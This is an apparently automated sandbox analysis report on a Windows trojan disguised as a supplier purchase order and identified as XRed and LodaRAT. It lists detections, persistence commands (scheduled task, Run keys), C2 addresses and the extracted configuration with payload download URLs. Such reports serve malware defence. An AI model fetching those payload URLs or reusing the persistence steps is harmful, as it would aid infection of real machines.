Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
New PO - Supplier 0202AW-PER2.exe

Overview

General Information

Sample name:New PO - Supplier 0202AW-PER2.exe
Analysis ID:1580482
MD5:17fb4f9df5175e684a3427c5997b2007
SHA1:c7b207497e0171fbb8fca648d82753abbf42b0b8
SHA256:8f66247597f18a7b3f20dbdf2d29330f716222bd500a7a95642137e84fa3b3d3
Tags:exeuser-malrpt
Infos:

Detection

LodaRAT, XRed
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LodaRAT
Yara detected XRed
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with functions possibly related to ADO stream file operations
Document contains an embedded VBA with functions possibly related to HTTP operations
Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)
Drops PE files to the document folder of the user
Found API chain indicative of sandbox detection
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Potentially Suspicious Malware Callback Communication
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Uses dynamic DNS services
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May infect USB drives
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
OS version to string mapping found (often used in BOTs)
One or more processes crash
PE file contains executable resources (Code or Archives)
Potential key logger detected (key state polling based)
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Sleep loop found (likely to delay execution)
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara detected ProcessChecker

Classification

Process Tree

  • System is w10x64
  • New PO - Supplier 0202AW-PER2.exe (PID: 6636 cmdline: "C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exe" MD5: 17FB4F9DF5175E684A3427C5997B2007)
    • ._cache_New PO - Supplier 0202AW-PER2.exe (PID: 3848 cmdline: "C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe" MD5: 7E05F5F77F8A0F63634CD734AE52CE55)
      • cmd.exe (PID: 2536 cmdline: C:\Windows\system32\cmd.exe /c schtasks /create /tn QHCPYO.exe /tr C:\Users\user\AppData\Roaming\Windata\NUHORT.exe /sc minute /mo 1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 6344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • schtasks.exe (PID: 5652 cmdline: schtasks /create /tn QHCPYO.exe /tr C:\Users\user\AppData\Roaming\Windata\NUHORT.exe /sc minute /mo 1 MD5: 48C2FE20575769DE916F48EF0676A965)
      • wscript.exe (PID: 3704 cmdline: WSCript C:\Users\user\AppData\Local\Temp\QHCPYO.vbs MD5: FF00E0480075B095948000BDC66E81F0)
    • Synaptics.exe (PID: 4076 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate MD5: B30E717CDE0FA4A5DE907A7148308430)
      • WerFault.exe (PID: 10076 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4076 -s 23736 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • WerFault.exe (PID: 6364 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4076 -s 17084 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • WerFault.exe (PID: 1896 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4076 -s 14008 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • EXCEL.EXE (PID: 736 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: 4A871771235598812032C822E6F68F19)
    • splwow64.exe (PID: 10224 cmdline: C:\Windows\splwow64.exe 12288 MD5: 77DE7761B037061C7C112FD3C5B91E73)
  • NUHORT.exe (PID: 2000 cmdline: C:\Users\user\AppData\Roaming\Windata\NUHORT.exe MD5: 7E05F5F77F8A0F63634CD734AE52CE55)
  • NUHORT.exe (PID: 7600 cmdline: "C:\Users\user\AppData\Roaming\Windata\NUHORT.exe" MD5: 7E05F5F77F8A0F63634CD734AE52CE55)
  • Synaptics.exe (PID: 8156 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" MD5: B30E717CDE0FA4A5DE907A7148308430)
  • NUHORT.exe (PID: 8020 cmdline: "C:\Users\user\AppData\Roaming\Windata\NUHORT.exe" MD5: 7E05F5F77F8A0F63634CD734AE52CE55)
  • NUHORT.exe (PID: 3396 cmdline: "C:\Users\user\AppData\Roaming\Windata\NUHORT.exe" MD5: 7E05F5F77F8A0F63634CD734AE52CE55)
  • NUHORT.exe (PID: 8664 cmdline: C:\Users\user\AppData\Roaming\Windata\NUHORT.exe MD5: 7E05F5F77F8A0F63634CD734AE52CE55)
  • NUHORT.exe (PID: 10176 cmdline: C:\Users\user\AppData\Roaming\Windata\NUHORT.exe MD5: 7E05F5F77F8A0F63634CD734AE52CE55)
  • NUHORT.exe (PID: 4824 cmdline: C:\Users\user\AppData\Roaming\Windata\NUHORT.exe MD5: 7E05F5F77F8A0F63634CD734AE52CE55)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Loda, LodaRATLoda is a previously undocumented AutoIT malware with a variety of capabilities for spying on victims. Proofpoint first observed Loda in September of 2016 and it has since grown in popularity. The name Loda is derived from a directory to which the malware author chose to write keylogger logs. It should be noted that some antivirus products currently detect Loda as Trojan.Nymeria, although the connection is not well-documented.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.loda

Malware Configuration

Threatname: XRed

{"C2 url": "xred.mooo.com", "Email": "xredline1@gmail.com", "Payload urls": ["http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download", "https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1", "http://xred.site50.net/syn/SUpdate.ini", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download", "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1", "http://xred.site50.net/syn/Synaptics.rar", "https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download", "https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1", "http://xred.site50.net/syn/SSLLibrary.dll"]}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
New PO - Supplier 0202AW-PER2.exeJoeSecurity_XRedYara detected XRedJoe Security
    New PO - Supplier 0202AW-PER2.exeJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security

      PCAP (Network Traffic)

      SourceRuleDescriptionAuthorStrings
      dump.pcapJoeSecurity_LodaRat_1Yara detected LodaRATJoe Security

        Dropped Files

        SourceRuleDescriptionAuthorStrings
        C:\Users\user\AppData\Local\Temp\QHCPYO.vbsJoeSecurity_ProcessCheckerYara detected ProcessCheckerJoe Security
          C:\Users\user\Documents\~$cache1JoeSecurity_XRedYara detected XRedJoe Security
            C:\Users\user\Documents\~$cache1JoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
              C:\ProgramData\Synaptics\Synaptics.exeJoeSecurity_XRedYara detected XRedJoe Security
                C:\ProgramData\Synaptics\Synaptics.exeJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                  Click to see the 2 entries

                  Memory Dumps

                  SourceRuleDescriptionAuthorStrings
                  00000001.00000002.4549568281.000000000411C000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_ProcessCheckerYara detected ProcessCheckerJoe Security
                    00000006.00000002.4540189896.0000000003430000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_ProcessCheckerYara detected ProcessCheckerJoe Security
                      00000006.00000002.4538842367.0000000003158000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_ProcessCheckerYara detected ProcessCheckerJoe Security
                        00000000.00000000.1681174852.0000000000401000.00000020.00000001.01000000.00000003.sdmpJoeSecurity_XRedYara detected XRedJoe Security
                          00000000.00000000.1681174852.0000000000401000.00000020.00000001.01000000.00000003.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                            Click to see the 5 entries

                            Unpacked PEs

                            SourceRuleDescriptionAuthorStrings
                            0.0.New PO - Supplier 0202AW-PER2.exe.400000.0.unpackJoeSecurity_XRedYara detected XRedJoe Security
                              0.0.New PO - Supplier 0202AW-PER2.exe.400000.0.unpackJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security

                                Sigma Signatures

                                System Summary

                                barindex
                                Sigma detected: Potentially Suspicious Malware Callback Communication
                                Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 172.111.138.100, DestinationIsIpv6: false, DestinationPort: 5552, EventID: 3, Image: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe, Initiated: true, ProcessId: 3848, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49747
                                Sigma detected: Script Interpreter Execution From Suspicious Folder
                                Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: WSCript C:\Users\user\AppData\Local\Temp\QHCPYO.vbs, CommandLine: WSCript C:\Users\user\AppData\Local\Temp\QHCPYO.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe" , ParentImage: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe, ParentProcessId: 3848, ParentProcessName: ._cache_New PO - Supplier 0202AW-PER2.exe, ProcessCommandLine: WSCript C:\Users\user\AppData\Local\Temp\QHCPYO.vbs, ProcessId: 3704, ProcessName: wscript.exe
                                Sigma detected: Suspicious Script Execution From Temp Folder
                                Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: WSCript C:\Users\user\AppData\Local\Temp\QHCPYO.vbs, CommandLine: WSCript C:\Users\user\AppData\Local\Temp\QHCPYO.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe" , ParentImage: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe, ParentProcessId: 3848, ParentProcessName: ._cache_New PO - Supplier 0202AW-PER2.exe, ProcessCommandLine: WSCript C:\Users\user\AppData\Local\Temp\QHCPYO.vbs, ProcessId: 3704, ProcessName: wscript.exe
                                Sigma detected: WScript or CScript Dropper
                                Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: WSCript C:\Users\user\AppData\Local\Temp\QHCPYO.vbs, CommandLine: WSCript C:\Users\user\AppData\Local\Temp\QHCPYO.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe" , ParentImage: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe, ParentProcessId: 3848, ParentProcessName: ._cache_New PO - Supplier 0202AW-PER2.exe, ProcessCommandLine: WSCript C:\Users\user\AppData\Local\Temp\QHCPYO.vbs, ProcessId: 3704, ProcessName: wscript.exe
                                Sigma detected: CurrentVersion Autorun Keys Modification
                                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Users\user\AppData\Roaming\Windata\NUHORT.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe, ProcessId: 3848, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\QHCPYO
                                Sigma detected: Startup Folder File Write
                                Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe, ProcessId: 3848, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QHCPYO.lnk
                                Sigma detected: Suspicious Schtasks From Env Var Folder
                                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks /create /tn QHCPYO.exe /tr C:\Users\user\AppData\Roaming\Windata\NUHORT.exe /sc minute /mo 1, CommandLine: schtasks /create /tn QHCPYO.exe /tr C:\Users\user\AppData\Roaming\Windata\NUHORT.exe /sc minute /mo 1, CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn QHCPYO.exe /tr C:\Users\user\AppData\Roaming\Windata\NUHORT.exe /sc minute /mo 1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2536, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /tn QHCPYO.exe /tr C:\Users\user\AppData\Roaming\Windata\NUHORT.exe /sc minute /mo 1, ProcessId: 5652, ProcessName: schtasks.exe
                                Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                                Source: Process startedAuthor: Michael Haag: Data: Command: WSCript C:\Users\user\AppData\Local\Temp\QHCPYO.vbs, CommandLine: WSCript C:\Users\user\AppData\Local\Temp\QHCPYO.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe" , ParentImage: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe, ParentProcessId: 3848, ParentProcessName: ._cache_New PO - Supplier 0202AW-PER2.exe, ProcessCommandLine: WSCript C:\Users\user\AppData\Local\Temp\QHCPYO.vbs, ProcessId: 3704, ProcessName: wscript.exe
                                Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
                                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\ProgramData\Synaptics\Synaptics.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exe, ProcessId: 6636, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver
                                Sigma detected: Office Macro File Creation
                                Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\ProgramData\Synaptics\Synaptics.exe, ProcessId: 4076, TargetFilename: C:\Users\user\AppData\Local\Temp\ExL2BsMQ.xlsm

                                Suricata Signatures

                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-12-24T18:20:11.251921+010020448871A Network Trojan was detected192.168.2.449735142.250.181.14443TCP
                                2024-12-24T18:20:11.252693+010020448871A Network Trojan was detected192.168.2.449734142.250.181.14443TCP
                                2024-12-24T18:20:13.951601+010020448871A Network Trojan was detected192.168.2.449742142.250.181.14443TCP
                                2024-12-24T18:20:13.966068+010020448871A Network Trojan was detected192.168.2.449741142.250.181.14443TCP
                                2024-12-24T18:20:17.902494+010020448871A Network Trojan was detected192.168.2.449761142.250.181.14443TCP
                                2024-12-24T18:20:17.904658+010020448871A Network Trojan was detected192.168.2.449760142.250.181.14443TCP
                                2024-12-24T18:20:20.514638+010020448871A Network Trojan was detected192.168.2.449765142.250.181.14443TCP
                                2024-12-24T18:20:20.519594+010020448871A Network Trojan was detected192.168.2.449766142.250.181.14443TCP
                                2024-12-24T18:20:24.516667+010020448871A Network Trojan was detected192.168.2.449781142.250.181.14443TCP
                                2024-12-24T18:20:24.517934+010020448871A Network Trojan was detected192.168.2.449780142.250.181.14443TCP
                                2024-12-24T18:20:27.217751+010020448871A Network Trojan was detected192.168.2.449785142.250.181.14443TCP
                                2024-12-24T18:20:27.226650+010020448871A Network Trojan was detected192.168.2.449784142.250.181.14443TCP
                                2024-12-24T18:20:30.233932+010020448871A Network Trojan was detected192.168.2.449797142.250.181.14443TCP
                                2024-12-24T18:20:30.251805+010020448871A Network Trojan was detected192.168.2.449796142.250.181.14443TCP
                                2024-12-24T18:20:34.260356+010020448871A Network Trojan was detected192.168.2.449809142.250.181.14443TCP
                                2024-12-24T18:20:34.270510+010020448871A Network Trojan was detected192.168.2.449808142.250.181.14443TCP
                                2024-12-24T18:20:36.860379+010020448871A Network Trojan was detected192.168.2.449813142.250.181.14443TCP
                                2024-12-24T18:20:36.882214+010020448871A Network Trojan was detected192.168.2.449814142.250.181.14443TCP
                                2024-12-24T18:20:40.321971+010020448871A Network Trojan was detected192.168.2.449823142.250.181.14443TCP
                                2024-12-24T18:20:40.345193+010020448871A Network Trojan was detected192.168.2.449824142.250.181.14443TCP
                                2024-12-24T18:20:42.932455+010020448871A Network Trojan was detected192.168.2.449829142.250.181.14443TCP
                                2024-12-24T18:20:42.946042+010020448871A Network Trojan was detected192.168.2.449831142.250.181.14443TCP
                                2024-12-24T18:20:46.074262+010020448871A Network Trojan was detected192.168.2.449840142.250.181.14443TCP
                                2024-12-24T18:20:46.074269+010020448871A Network Trojan was detected192.168.2.449839142.250.181.14443TCP
                                2024-12-24T18:20:50.040136+010020448871A Network Trojan was detected192.168.2.449849142.250.181.14443TCP
                                2024-12-24T18:20:50.054776+010020448871A Network Trojan was detected192.168.2.449848142.250.181.14443TCP
                                2024-12-24T18:20:54.099656+010020448871A Network Trojan was detected192.168.2.449857142.250.181.14443TCP
                                2024-12-24T18:20:54.250482+010020448871A Network Trojan was detected192.168.2.449858142.250.181.14443TCP
                                2024-12-24T18:20:58.085509+010020448871A Network Trojan was detected192.168.2.449868142.250.181.14443TCP
                                2024-12-24T18:20:58.091989+010020448871A Network Trojan was detected192.168.2.449867142.250.181.14443TCP
                                2024-12-24T18:21:00.704768+010020448871A Network Trojan was detected192.168.2.449873142.250.181.14443TCP
                                2024-12-24T18:21:00.708739+010020448871A Network Trojan was detected192.168.2.449876142.250.181.14443TCP
                                2024-12-24T18:21:03.796240+010020448871A Network Trojan was detected192.168.2.449890142.250.181.14443TCP
                                2024-12-24T18:21:03.799383+010020448871A Network Trojan was detected192.168.2.449889142.250.181.14443TCP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-12-24T18:20:20.769709+010028221161Malware Command and Control Activity Detected192.168.2.449776172.111.138.1005552TCP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-12-24T18:20:58.443180+010028309121Malware Command and Control Activity Detected172.111.138.1005552192.168.2.449801TCP
                                2024-12-24T18:21:42.237001+010028309121Malware Command and Control Activity Detected172.111.138.1005552192.168.2.449801TCP
                                2024-12-24T18:22:25.713716+010028309121Malware Command and Control Activity Detected172.111.138.1005552192.168.2.449801TCP
                                2024-12-24T18:23:02.164540+010028309121Malware Command and Control Activity Detected172.111.138.1005552192.168.2.449801TCP
                                2024-12-24T18:23:40.182859+010028309121Malware Command and Control Activity Detected172.111.138.1005552192.168.2.449801TCP
                                2024-12-24T18:24:24.239329+010028309121Malware Command and Control Activity Detected172.111.138.1005552192.168.2.449801TCP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-12-24T18:20:11.099872+010028326171Malware Command and Control Activity Detected192.168.2.44973969.42.215.25280TCP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-12-24T18:20:03.412054+010028498851Malware Command and Control Activity Detected192.168.2.449776172.111.138.1005552TCP
                                2024-12-24T18:20:03.412054+010028498851Malware Command and Control Activity Detected192.168.2.449747172.111.138.1005552TCP
                                2024-12-24T18:20:03.412054+010028498851Malware Command and Control Activity Detected192.168.2.449801172.111.138.1005552TCP
                                2024-12-24T18:20:11.584241+010028498851Malware Command and Control Activity Detected192.168.2.449747172.111.138.1005552TCP
                                2024-12-24T18:20:20.769709+010028498851Malware Command and Control Activity Detected192.168.2.449776172.111.138.1005552TCP
                                2024-12-24T18:20:29.892187+010028498851Malware Command and Control Activity Detected192.168.2.449801172.111.138.1005552TCP

                                Joe Sandbox Signatures

                                Click to jump to signature section

                                Show All Signature Results

                                AV Detection

                                barindex
                                Antivirus / Scanner detection for submitted sample
                                Source: New PO - Supplier 0202AW-PER2.exeAvira: detected
                                Source: New PO - Supplier 0202AW-PER2.exeAvira: detected
                                Antivirus detection for URL or domain
                                Source: http://xred.site50.net/syn/SSLLibrary.dlAvira URL Cloud: Label: malware
                                Source: http://xred.site50.net/syn/Synaptics.rar8Avira URL Cloud: Label: malware
                                Source: http://xred.site50.net/syn/SSLLibrary.dllAvira URL Cloud: Label: malware
                                Source: http://xred.site50.net/syn/Synaptics.rarAvira URL Cloud: Label: malware
                                Source: http://xred.site50.net/syn/SUpdate.iniAvira URL Cloud: Label: malware
                                Antivirus detection for dropped file
                                Source: C:\Users\user\Documents\~$cache1Avira: detection malicious, Label: TR/Dldr.Agent.SH
                                Source: C:\Users\user\Documents\~$cache1Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                                Source: C:\Users\user\AppData\Local\Temp\QHCPYO.vbsAvira: detection malicious, Label: VBS/Runner.VPJI
                                Source: C:\ProgramData\Synaptics\Synaptics.exeAvira: detection malicious, Label: TR/Dldr.Agent.SH
                                Source: C:\ProgramData\Synaptics\Synaptics.exeAvira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                                Source: C:\ProgramData\Synaptics\RCX76FB.tmpAvira: detection malicious, Label: TR/Dldr.Agent.SH
                                Source: C:\ProgramData\Synaptics\RCX76FB.tmpAvira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                                Found malware configuration
                                Source: New PO - Supplier 0202AW-PER2.exeMalware Configuration Extractor: XRed {"C2 url": "xred.mooo.com", "Email": "xredline1@gmail.com", "Payload urls": ["http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download", "https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1", "http://xred.site50.net/syn/SUpdate.ini", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download", "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1", "http://xred.site50.net/syn/Synaptics.rar", "https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download", "https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1", "http://xred.site50.net/syn/SSLLibrary.dll"]}
                                Multi AV Scanner detection for dropped file
                                Source: C:\ProgramData\Synaptics\Synaptics.exeReversingLabs: Detection: 92%
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeReversingLabs: Detection: 50%
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeReversingLabs: Detection: 50%
                                Multi AV Scanner detection for submitted file
                                Source: New PO - Supplier 0202AW-PER2.exeReversingLabs: Detection: 92%
                                AI detected suspicious sample
                                Source: Submited SampleIntegrated Neural Analysis Model: Matched 96.6% probability
                                Machine Learning detection for dropped file
                                Source: C:\Users\user\Documents\~$cache1Joe Sandbox ML: detected
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeJoe Sandbox ML: detected
                                Source: C:\ProgramData\Synaptics\Synaptics.exeJoe Sandbox ML: detected
                                Source: C:\ProgramData\Synaptics\RCX76FB.tmpJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeJoe Sandbox ML: detected
                                Machine Learning detection for sample
                                Source: New PO - Supplier 0202AW-PER2.exeJoe Sandbox ML: detected
                                Source: New PO - Supplier 0202AW-PER2.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49734 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49735 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49742 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49741 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.4:49745 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.4:49746 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49761 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49760 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.4:49768 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.4:49767 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49781 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49780 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49785 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49784 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.4:49786 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.4:49787 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49797 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49796 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49808 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49809 version: TLS 1.2
